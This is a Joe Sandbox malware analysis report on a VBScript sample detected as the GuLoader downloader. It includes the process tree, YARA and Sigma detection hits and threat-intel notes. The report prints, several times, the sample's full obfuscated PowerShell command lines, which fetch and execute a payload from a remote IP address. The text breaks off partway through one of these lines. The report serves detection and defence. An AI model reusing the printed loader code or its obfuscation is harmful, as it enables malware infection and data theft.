Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Agterdelen.vbs

Overview

General Information

Sample name:Agterdelen.vbs
Analysis ID:1665610
MD5:00aac0b28f4c3970a69309489db29b89
SHA1:3d6214dcc63c9d3ffbfbfd402c62b99697787c69
SHA256:200aa88835a9db6e9af5dad6550e26806ea869ce94b9c8098c68521bf3bc6af4
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7832 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1040 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtelAssy.:Cre cA rideQ .vlsuVindaa SkribGe.neERadiolVerdel ScalE Brio=Cityin BrugeKabelwCross- SeicOResulbMa lejDatatE Me.nCSugetTGol c So iSefforycanzoSTeleftVild,ET.erimSe,nd. Ynde$ TevaPRe.chRTe neoR vieTSmaasOL ndsZpusilo He,tahovedl');Desiodothyroxine3 ($Skaberkrfters);Desiodothyroxine3 (Centralkomites 'pho o$Dy buAEssigqbes uuBl,kdaC.anub LicieLivrelDyrtilL vtseDukse. rebHSlagte miniaPreandGedebeHeterrCar.osCinch[extor$PyramT aserrCol paEth rnQua rs Te tcOplivu,aklilSpurgtCountuCzekor roubaSaltgtSt,ininytteogaasenFors ]Barsl=Under$TetraA Snowf PangfSavinaRekhtl P.ocdMixils RectbRoyaleWanglhRounda Dek nFa,ord esilForesis esvnNoresgopmaasBenedsGangeyRek nsEns,etMoniteEchoem');$Phraseology=Centralkomites 'Respi$tagasAEpignqGrantu hicaDiasybMastaeSkyd lSoffilBrotheHvlve.UnderDfam.lo trbswSkrivnAth elUdbryo MaldaSu frd CokeFDriftiHl.nilSkalkeBrnep(In.fr$HotmeBTrernrLieutiCobirg Ac rgPl nksFeltrkZohar1 Skum1Overh6Crota,Jo,le$ExpiaM Ta aiVidernSoci iAntipmJambia Doc lRaadll.aramn C,esnG deseFormad Thete Spin)';$Minimallnnede=$Afgivelsens;Desiodothyroxine3 (Centralkomites ' Ages$Anm lgVelfoLGemmeoTe plB guicABlok,lBor,v:SintrMBetonAOldkirblimbX TrirI BallsSopraMHedonEDesse= ormb(Bloodt ves EPresuSMotivtBlodu-CountpPlaneaUndiftNummeH and Quadr$TriniMskostiA.ksiNSwimmi Hi hm LandAL.medLsiltelSpaninIhje nOpve EtaellD Pte eSkra,)');while (!$Marxisme) {Desiodothyroxine3 (Centralkomites 'Celsi$JealogGallulDebatobrutabP eacaMhedel prng:autooBS indaEl,keaOstradC,mpal D phnD awag Fetid AceteUn.ep=Friha$Sto dvAmonheamp.ir SlogmKbenhoDerieu unbulLaboru') ;Desiodothyroxine3 $Phraseology;Desiodothyroxine3 (Centralkomites ' Unnu[S utsT inimhGardnrBlafreAfhngaReoccdSh ndI enernAntifgPugna.EkstrT phobHStokkrTaktre AarsA ,kovdKbsst]Fyrin:umrke: S gts SchiLskrupetr stEAntaiPVe.st(drmme4Slikk0 Ca o0Desir0Sho.t)');Desiodothyroxine3 (Centralkomites 'Crani$For.nG A luLFrugtOUnwarbhusasa oextlKredi:Peri MBilliaTorperspookXAimfuiesrogs undemhalsbe Hype= nsva( Barnt LokaeBermts,emogTca so-FljalP TallASi naTUn,ochPelsd Acan $MatchmAadseiBegonNKultuiSimazMRevi aAutodLBevisLHanden BajonSpumaER forDCavumeBygni)') ;Desiodothyroxine3 (Centralkomites ' Tran$InterGmaniolDrankO,cquibpaillaFerroLCadav:Str,gGM ltiECosmonMesacScourbt StriA RockN BrylD Korts Rkenl VirtSUnde,= S,ld$animagwel mL P,raOFarfubUnde.AovercLmusef:UnimpDUdgifoSeksatslattTHemihe DeltDThomanEft,reSmygeSsuttes ,ide+udmaa+ Blin%Paavi$ orrepStnkeRCigariBi dsS yngek Ni,hr Hi ticorrog,ychnE UndenUntrue F.em.ToppuCBedtiOMaskiUElvchnGl.rit') ;$Briggsk116=$Priskrigene[$Genstandsls]}$Pitarah=399137;$akademikerarbejdslshed=32580;Desiodothyroxine3 (Centralkomites 'Vizie$UdkasGBoulel Fr,mO LienbStagga NugaLLev,l:L mnepGulliopo rleAns,it Ge nHtor eo scheo,agcedPlatt Slowb= Dang IndlgG TilfEMaanatCou t-Plkkec VsenoAntitnPacifTBams edoumaNGavagT Flan Berig$MilamM OverI BrunNLitteIFrostmTyperA CirkLAvisllPalaeNGradiN fkrie J niD Py ie');Desiodothyroxine3 (Centralkomites 'Hinge$kongrgFolkelKlaskoSy.pobNe riaErhvel Flor: FjerS BronuS kenm TrivpNrin eDiebag My enSk ls Fre = Te.s Tri a[FlyrpSFdselyHomocs protAuktieMeditmKogej.PraktCPrvetoudtrrnde,erv MatreEksamr Ter.tYnded]Nonco: Ic n: I,ddFMildhrFast,oPy.temBe alBVagtma Rimls uedaeOdac.6Mista4EffekSPerirtStjerr BirtiAftalnCondeg Shee(Boner$ MycoPGajauo hetreCo artSpindhGammoo B auoDiarcdEjerl)');Desiodothyroxine3 (Centralkomites 'Kmpem$D.mongNeotel MimiOspegeb GeneAfl vel germ:Prel.OVocabVSyna eNonmuR Ze gNMalagEUnornrVa asvPreinoFje,duSpontSSabelLAlec YAnten Exist=Enh d assa[Aads,sSommeY OnomS O.skT CalceRdmesMAnbef. Log,TSu trePerscXRgsk.T fsen.GrnsiE TrasnG ndaCUnmovoVam edDundeIUndf NIceboG.illi] emop:Intel:bomseaSalsus Misac DalaIGobanIRarif.Udr nGIl faEFr ertMercisI.hthtKrediRUdsvviCabalN NdsaGUdskr(Tri o$krimisKrediu ArviMRembopL ctoEmethogElaboNTeam )');Desiodothyroxine3 (Centralkomites 'Skriv$InfangTon.vlClinoo A.pebGpdhoa SaltLBrevd:MyosctbeforJfairfsVan dtA.tieaMinerT GelliIbsenv ImpoEUndirrLusatnGir sEDr,susBeari=Hensi$EnchaoGuldmVSpu.vELyngsR U moNBasebeBesvarAnarkvHegelO BranUKamm,sAspirl PresYSouch.StemmS Tra uOmforbSkovlSforlitBa rdrCin.aIUnpatn Neongstjer( Tran$,hlorPkvgp,iUlydiTHobeda CaddR,paidALawk H Pro , Tibe$ferl aStempKNeutrADis rd IberEKonflmPseudiSweatk ProgEUkraiRPagura SpydRRelisbvildtenonphJDemisd Din SOleagLBe,okSMant,hMegamE aresd ntre)');Desiodothyroxine3 $Tjstativernes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    Process Memory Space: powershell.exe PID: 8104JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 8104INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x21f3f7:$b2: ::FromBase64String(
      • 0x21f42e:$b2: ::FromBase64String(
      • 0x21f466:$b2: ::FromBase64String(
      • 0x21f49f:$b2: ::FromBase64String(
      • 0x21f4d9:$b2: ::FromBase64String(
      • 0x21f514:$b2: ::FromBase64String(
      • 0x21f550:$b2: ::FromBase64String(
      • 0x21f58d:$b2: ::FromBase64String(
      • 0x21f5cb:$b2: ::FromBase64String(
      • 0x21f60a:$b2: ::FromBase64String(
      • 0x21f64a:$b2: ::FromBase64String(
      • 0x2b8ed8:$b2: ::FromBase64String(
      • 0x9247:$s1: -join
      • 0x59df8:$s1: -join
      • 0x5ece2:$s1: -join
      • 0x136c3c:$s1: -join
      • 0x2e1363:$s1: -join
      • 0x2ec99e:$s1: -join
      • 0x2f9a73:$s1: -join
      • 0x2fce45:$s1: -join
      • 0x2fd4f7:$s1: -join
      Process Memory Space: powershell.exe PID: 1040JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1040INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xb6c24:$b2: ::FromBase64String(
        • 0xb208a:$s1: -join
        • 0x178de6:$s1: -join
        • 0x185ebb:$s1: -join
        • 0x18928d:$s1: -join
        • 0x18993f:$s1: -join
        • 0x18b430:$s1: -join
        • 0x18d636:$s1: -join
        • 0x18de5d:$s1: -join
        • 0x18e6cd:$s1: -join
        • 0x18ee08:$s1: -join
        • 0x18ee3a:$s1: -join
        • 0x18ee82:$s1: -join
        • 0x18eea1:$s1: -join
        • 0x18f6f1:$s1: -join
        • 0x18f86d:$s1: -join
        • 0x18f8e5:$s1: -join
        • 0x18f978:$s1: -join
        • 0x18fbde:$s1: -join
        • 0x191d74:$s1: -join
        • 0x1a07be:$s1: -join

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_8104.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_1040.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xcf7d:$b2: ::FromBase64String(
          • 0xc9ac:$s1: -join
          • 0x6158:$s4: +=
          • 0x621a:$s4: +=
          • 0xa441:$s4: +=
          • 0xc55e:$s4: +=
          • 0xc848:$s4: +=
          • 0xc98e:$s4: +=
          • 0x168b0:$s4: +=
          • 0x16930:$s4: +=
          • 0x169f6:$s4: +=
          • 0x16a76:$s4: +=
          • 0x16c4c:$s4: +=
          • 0x16cd0:$s4: +=
          • 0x3bce:$e4: Get-WmiObject
          • 0x3dbd:$e4: Get-Process
          • 0x3e15:$e4: Start-Process
          • 0x17550:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", ProcessId: 7832, ProcessName: wscript.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs", ProcessId: 7832, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK 